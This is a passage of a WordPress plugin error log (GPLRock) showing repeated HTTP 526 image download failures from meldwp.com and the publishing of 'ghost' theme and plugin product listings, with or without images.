tuning-car-detailing-dealer-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:30:31 UTC] GPLRock: Image download failed for product tuning-car-detailing-dealer-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:30:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tuning---car-detailing--dealer-shop-wordpress-theme-29680.webp for product tuning-car-detailing-dealer-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:30:33 UTC] GPLRock WARNING: Image download failed for product tuning-car-detailing-dealer-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tuning---car-detailing--dealer-shop-wordpress-theme-29680.webp [05-Apr-2026 11:30:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tuning-car-detailing-dealer-shop-wordpress-theme [05-Apr-2026 11:30:33 UTC] GPLRock: Image download failed for product acumen-the-highly-extensible-magento-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:30:36 UTC] GPLRock: Image download failed for product acumen-the-highly-extensible-magento-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:30:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/acumen---the-highly-extensible-magento-theme-7518.webp for product acumen-the-highly-extensible-magento-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:30:38 UTC] GPLRock: Image download failed for product acumen-the-highly-extensible-magento-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:30:40 UTC] GPLRock: Image download failed for product acumen-the-highly-extensible-magento-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:30:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/acumen---the-highly-extensible-magento-theme-7518.webp for product acumen-the-highly-extensible-magento-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:30:42 UTC] GPLRock WARNING: Image download failed for product acumen-the-highly-extensible-magento-theme. URL: https://meldwp.com/wp-content/uploads/acumen---the-highly-extensible-magento-theme-7518.webp [05-Apr-2026 11:30:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: acumen-the-highly-extensible-magento-theme [05-Apr-2026 11:30:42 UTC] GPLRock: Image download failed for product impatto-personal-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:30:44 UTC] GPLRock: Image download failed for product impatto-personal-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:30:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/impatto---personal-blog-wordpress-theme-33691.webp for product impatto-personal-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:30:46 UTC] GPLRock: Image download failed for product impatto-personal-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:30:49 UTC] GPLRock: Image download failed for product impatto-personal-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:30:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/impatto---personal-blog-wordpress-theme-33691.webp for product impatto-personal-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:30:51 UTC] GPLRock WARNING: Image download failed for product impatto-personal-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/impatto---personal-blog-wordpress-theme-33691.webp [05-Apr-2026 11:30:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: impatto-personal-blog-wordpress-theme [05-Apr-2026 11:30:51 UTC] GPLRock: Image downloaded successfully for product ontap-brewery-restaurant-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5a22da16.webp [05-Apr-2026 11:30:51 UTC] GPLRock: Using pre-downloaded image for product ontap-brewery-restaurant-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5a22da16.webp [05-Apr-2026 11:30:51 UTC] GPLRock: Ghost product published with image - Product ID: ontap-brewery-restaurant-wordpress-theme [05-Apr-2026 11:30:51 UTC] GPLRock: Image downloaded successfully for product techkit-technology-it-solutions-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e6944cc2.webp [05-Apr-2026 11:30:51 UTC] GPLRock: Using pre-downloaded image for product techkit-technology-it-solutions-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e6944cc2.webp [05-Apr-2026 11:30:51 UTC] GPLRock: Ghost product published with image - Product ID: techkit-technology-it-solutions-wordpress-theme [05-Apr-2026 11:30:51 UTC] GPLRock: Image download failed for product manila-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:30:53 UTC] GPLRock: Image download failed for product manila-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:30:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/manila---portfolio-wordpress-theme-24345.webp for product manila-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:30:55 UTC] GPLRock: Image download failed for product manila-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:30:57 UTC] GPLRock: Image download failed for product manila-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:30:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/manila---portfolio-wordpress-theme-24345.webp for product manila-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:30:59 UTC] GPLRock WARNING: Image download failed for product manila-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/manila---portfolio-wordpress-theme-24345.webp [05-Apr-2026 11:30:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: manila-portfolio-wordpress-theme [05-Apr-2026 11:31:00 UTC] GPLRock: Image download failed for product lavelo-wedding-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:31:02 UTC] GPLRock: Image download failed for product lavelo-wedding-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:31:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lavelo---wedding-wordpress-theme-32727.webp for product lavelo-wedding-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:31:04 UTC] GPLRock: Image download failed for product lavelo-wedding-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:31:06 UTC] GPLRock: Image download failed for product lavelo-wedding-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:31:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lavelo---wedding-wordpress-theme-32727.webp for product lavelo-wedding-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:31:08 UTC] GPLRock WARNING: Image download failed for product lavelo-wedding-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lavelo---wedding-wordpress-theme-32727.webp [05-Apr-2026 11:31:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lavelo-wedding-wordpress-theme [05-Apr-2026 11:31:08 UTC] GPLRock: Image download failed for product dastak-a-small-business-responsive-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:31:10 UTC] GPLRock: Image download failed for product dastak-a-small-business-responsive-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:31:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dastak---a-small-business-responsive-theme-22509.webp for product dastak-a-small-business-responsive-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:31:13 UTC] GPLRock: Image download failed for product dastak-a-small-business-responsive-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:31:15 UTC] GPLRock: Image download failed for product dastak-a-small-business-responsive-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:31:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dastak---a-small-business-responsive-theme-22509.webp for product dastak-a-small-business-responsive-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:31:17 UTC] GPLRock WARNING: Image download failed for product dastak-a-small-business-responsive-theme. URL: https://meldwp.com/wp-content/uploads/dastak---a-small-business-responsive-theme-22509.webp [05-Apr-2026 11:31:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dastak-a-small-business-responsive-theme [05-Apr-2026 11:31:45 UTC] GPLRock: Image download failed for product rnb-woocommerce-booking-rental-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:31:48 UTC] GPLRock: Image download failed for product rnb-woocommerce-booking-rental-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:31:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rnb---woocommerce-booking--rental-plugin-23899.webp for product rnb-woocommerce-booking-rental-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:31:50 UTC] GPLRock: Image download failed for product rnb-woocommerce-booking-rental-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:31:52 UTC] GPLRock: Image download failed for product rnb-woocommerce-booking-rental-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:31:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rnb---woocommerce-booking--rental-plugin-23899.webp for product rnb-woocommerce-booking-rental-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:31:54 UTC] GPLRock WARNING: Image download failed for product rnb-woocommerce-booking-rental-plugin. URL: https://meldwp.com/wp-content/uploads/rnb---woocommerce-booking--rental-plugin-23899.webp [05-Apr-2026 11:31:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rnb-woocommerce-booking-rental-plugin [05-Apr-2026 11:31:54 UTC] GPLRock: Image download failed for product availability-scheduler-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:31:56 UTC] GPLRock: Image download failed for product availability-scheduler-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:31:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/availability-scheduler-for-woocommerce-15381.webp for product availability-scheduler-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:31:59 UTC] GPLRock: Image download failed for product availability-scheduler-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:01 UTC] GPLRock: Image download failed for product availability-scheduler-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/availability-scheduler-for-woocommerce-15381.webp for product availability-scheduler-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:32:03 UTC] GPLRock WARNING: Image download failed for product availability-scheduler-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/availability-scheduler-for-woocommerce-15381.webp [05-Apr-2026 11:32:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: availability-scheduler-for-woocommerce [05-Apr-2026 11:32:03 UTC] GPLRock: Image download failed for product sharinger-share-buttons-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:05 UTC] GPLRock: Image download failed for product sharinger-share-buttons-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sharinger--share-buttons-for-elementor-27892.webp for product sharinger-share-buttons-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:32:07 UTC] GPLRock: Image download failed for product sharinger-share-buttons-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:10 UTC] GPLRock: Image download failed for product sharinger-share-buttons-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sharinger--share-buttons-for-elementor-27892.webp for product sharinger-share-buttons-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:32:12 UTC] GPLRock WARNING: Image download failed for product sharinger-share-buttons-for-elementor. URL: https://meldwp.com/wp-content/uploads/sharinger--share-buttons-for-elementor-27892.webp [05-Apr-2026 11:32:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sharinger-share-buttons-for-elementor [05-Apr-2026 11:32:12 UTC] GPLRock: Image download failed for product woocommerce-product-category-image-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:14 UTC] GPLRock: Image download failed for product woocommerce-product-category-image-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-category-image-addon-for-elementor-11163.webp for product woocommerce-product-category-image-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:32:16 UTC] GPLRock: Image download failed for product woocommerce-product-category-image-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:18 UTC] GPLRock: Image download failed for product woocommerce-product-category-image-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-category-image-addon-for-elementor-11163.webp for product woocommerce-product-category-image-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:32:20 UTC] GPLRock WARNING: Image download failed for product woocommerce-product-category-image-addon-for-elementor. URL: https://meldwp.com/wp-content/uploads/woocommerce-product-category-image-addon-for-elementor-11163.webp [05-Apr-2026 11:32:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-product-category-image-addon-for-elementor [05-Apr-2026 11:32:20 UTC] GPLRock: Image download failed for product masonry-hexagon-grid-gallery-pro-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:23 UTC] GPLRock: Image download failed for product masonry-hexagon-grid-gallery-pro-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/masonry-hexagon-grid-gallery-pro-addon-for-wpbakery-page-builder-22009.webp for product masonry-hexagon-grid-gallery-pro-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:32:25 UTC] GPLRock: Image download failed for product masonry-hexagon-grid-gallery-pro-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:27 UTC] GPLRock: Image download failed for product masonry-hexagon-grid-gallery-pro-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/masonry-hexagon-grid-gallery-pro-addon-for-wpbakery-page-builder-22009.webp for product masonry-hexagon-grid-gallery-pro-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:32:29 UTC] GPLRock WARNING: Image download failed for product masonry-hexagon-grid-gallery-pro-addon-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/masonry-hexagon-grid-gallery-pro-addon-for-wpbakery-page-builder-22009.webp [05-Apr-2026 11:32:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: masonry-hexagon-grid-gallery-pro-addon-for-wpbakery-page-builder [05-Apr-2026 11:32:29 UTC] GPLRock: Image download failed for product simple-pos-point-of-sale-made-easy (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:31 UTC] GPLRock: Image download failed for product simple-pos-point-of-sale-made-easy (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/simple-pos---point-of-sale-made-easy-29382.webp for product simple-pos-point-of-sale-made-easy after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:32:34 UTC] GPLRock: Image download failed for product simple-pos-point-of-sale-made-easy (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:36 UTC] GPLRock: Image download failed for product simple-pos-point-of-sale-made-easy (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/simple-pos---point-of-sale-made-easy-29382.webp for product simple-pos-point-of-sale-made-easy after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:32:38 UTC] GPLRock WARNING: Image download failed for product simple-pos-point-of-sale-made-easy. URL: https://meldwp.com/wp-content/uploads/simple-pos---point-of-sale-made-easy-29382.webp [05-Apr-2026 11:32:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: simple-pos-point-of-sale-made-easy [05-Apr-2026 11:32:38 UTC] GPLRock: Image download failed for product 3d-flipbook (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:40 UTC] GPLRock: Image download failed for product 3d-flipbook (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/3d-flipbook-3426.webp for product 3d-flipbook after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:32:42 UTC] GPLRock: Image download failed for product 3d-flipbook (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:44 UTC] GPLRock: Image download failed for product 3d-flipbook (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/3d-flipbook-3426.webp for product 3d-flipbook after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:32:47 UTC] GPLRock WARNING: Image download failed for product 3d-flipbook. URL: https://meldwp.com/wp-content/uploads/3d-flipbook-3426.webp [05-Apr-2026 11:32:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: 3d-flipbook [05-Apr-2026 11:32:47 UTC] GPLRock: Image download failed for product survform-survey-form-builder-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:49 UTC] GPLRock: Image download failed for product survform-survey-form-builder-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/survform---survey-form-builder-plugin-for-wordpress-26260.webp for product survform-survey-form-builder-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:32:51 UTC] GPLRock: Image download failed for product survform-survey-form-builder-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:53 UTC] GPLRock: Image download failed for product survform-survey-form-builder-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/survform---survey-form-builder-plugin-for-wordpress-26260.webp for product survform-survey-form-builder-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:32:55 UTC] GPLRock WARNING: Image download failed for product survform-survey-form-builder-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/survform---survey-form-builder-plugin-for-wordpress-26260.webp [05-Apr-2026 11:32:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: survform-survey-form-builder-plugin-for-wordpress [05-Apr-2026 11:32:56 UTC] GPLRock: Image download failed for product ah-survey-wordpress-survey-builder-with-multiple-questions-types (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:32:58 UTC] GPLRock: Image download failed for product ah-survey-wordpress-survey-builder-with-multiple-questions-types (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:33:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ah-survey---wordpress-survey-builder-with-multiple-questions-types-5294.webp for product ah-survey-wordpress-survey-builder-with-multiple-questions-types after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:33:00 UTC] GPLRock: Image download failed for product ah-survey-wordpress-survey-builder-with-multiple-questions-types (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:33:02 UTC] GPLRock: Image download failed for product ah-survey-wordpress-survey-builder-with-multiple-questions-types (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:33:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ah-survey---wordpress-survey-builder-with-multiple-questions-types-5294.webp for product ah-survey-wordpress-survey-builder-with-multiple-questions-types after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:33:04 UTC] GPLRock WARNING: Image download failed for product ah-survey-wordpress-survey-builder-with-multiple-questions-types. URL: https://meldwp.com/wp-content/uploads/ah-survey---wordpress-survey-builder-with-multiple-questions-types-5294.webp [05-Apr-2026 11:33:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ah-survey-wordpress-survey-builder-with-multiple-questions-types [05-Apr-2026 11:33:04 UTC] GPLRock: Image download failed for product mtdb-ultimate-movietv-database (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:33:06 UTC] GPLRock: Image download failed for product mtdb-ultimate-movietv-database (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:33:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mtdb---ultimate-movietv-database-21601.webp for product mtdb-ultimate-movietv-database after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:33:09 UTC] GPLRock: Image download failed for product mtdb-ultimate-movietv-database (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:33:11 UTC] GPLRock: Image download failed for product mtdb-ultimate-movietv-database (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:33:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mtdb---ultimate-movietv-database-21601.webp for product mtdb-ultimate-movietv-database after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:33:13 UTC] GPLRock WARNING: Image download failed for product mtdb-ultimate-movietv-database. URL: https://meldwp.com/wp-content/uploads/mtdb---ultimate-movietv-database-21601.webp [05-Apr-2026 11:33:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mtdb-ultimate-movietv-database [05-Apr-2026 11:34:09 UTC] GPLRock: Image downloaded successfully for product woocommerce-account-funds (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-feef66d3.jpg [05-Apr-2026 11:34:09 UTC] GPLRock: Using pre-downloaded image for product woocommerce-account-funds: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-feef66d3.jpg [05-Apr-2026 11:34:09 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-account-funds [05-Apr-2026 11:34:10 UTC] GPLRock: Image downloaded successfully for product woocommerce-pdf-watermark (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5520fb72.jpg [05-Apr-2026 11:34:11 UTC] GPLRock: Using pre-downloaded image for product woocommerce-pdf-watermark: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5520fb72.jpg [05-Apr-2026 11:34:11 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-pdf-watermark [05-Apr-2026 11:34:12 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-coinbase-payment-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0880c849.jpg [05-Apr-2026 11:34:12 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-coinbase-payment-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0880c849.jpg [05-Apr-2026 11:34:12 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-coinbase-payment-gateway [05-Apr-2026 11:34:13 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-resend-receipt (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dda12306.jpg [05-Apr-2026 11:34:14 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-resend-receipt: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dda12306.jpg [05-Apr-2026 11:34:14 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-resend-receipt [05-Apr-2026 11:34:15 UTC] GPLRock: Image downloaded successfully for product woothumbs-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-07a6fa25.jpg [05-Apr-2026 11:34:15 UTC] GPLRock: Using pre-downloaded image for product woothumbs-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-07a6fa25.jpg [05-Apr-2026 11:34:15 UTC] GPLRock: Ghost product published with image - Product ID: woothumbs-for-woocommerce [05-Apr-2026 11:34:16 UTC] GPLRock: Image downloaded successfully for product woocommerce-pdf-product-vouchers (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4ba4105b.jpg [05-Apr-2026 11:34:16 UTC] GPLRock: Using pre-downloaded image for product woocommerce-pdf-product-vouchers: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4ba4105b.jpg [05-Apr-2026 11:34:16 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-pdf-product-vouchers [05-Apr-2026 11:34:18 UTC] GPLRock: Image downloaded successfully for product airi-clean-minimal-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-286bd55c.jpg [05-Apr-2026 11:34:18 UTC] GPLRock: Using pre-downloaded image for product airi-clean-minimal-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-286bd55c.jpg [05-Apr-2026 11:34:18 UTC] GPLRock: Ghost product published with image - Product ID: airi-clean-minimal-woocommerce-theme [05-Apr-2026 11:34:20 UTC] GPLRock: Image downloaded successfully for product gravity-perks-gravity-forms-live-preview (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8811db82.jpg [05-Apr-2026 11:34:20 UTC] GPLRock: Using pre-downloaded image for product gravity-perks-gravity-forms-live-preview: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8811db82.jpg [05-Apr-2026 11:34:20 UTC] GPLRock: Ghost product published with image - Product ID: gravity-perks-gravity-forms-live-preview [05-Apr-2026 11:34:22 UTC] GPLRock: Image downloaded successfully for product gravity-forms-limit-submissions (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-175b6a57.jpg [05-Apr-2026 11:34:22 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-limit-submissions: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-175b6a57.jpg [05-Apr-2026 11:34:22 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-limit-submissions [05-Apr-2026 11:34:23 UTC] GPLRock: Image downloaded successfully for product gravity-forms-trello-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b312adda.jpg [05-Apr-2026 11:34:23 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-trello-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b312adda.jpg [05-Apr-2026 11:34:23 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-trello-addon [05-Apr-2026 11:35:51 UTC] GPLRock: Image download failed for product hungrybuzz-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:35:53 UTC] GPLRock: Image download failed for product hungrybuzz-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:35:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hungrybuzz---restaurant-wordpress-theme-32675.webp for product hungrybuzz-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:35:55 UTC] GPLRock: Image download failed for product hungrybuzz-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, 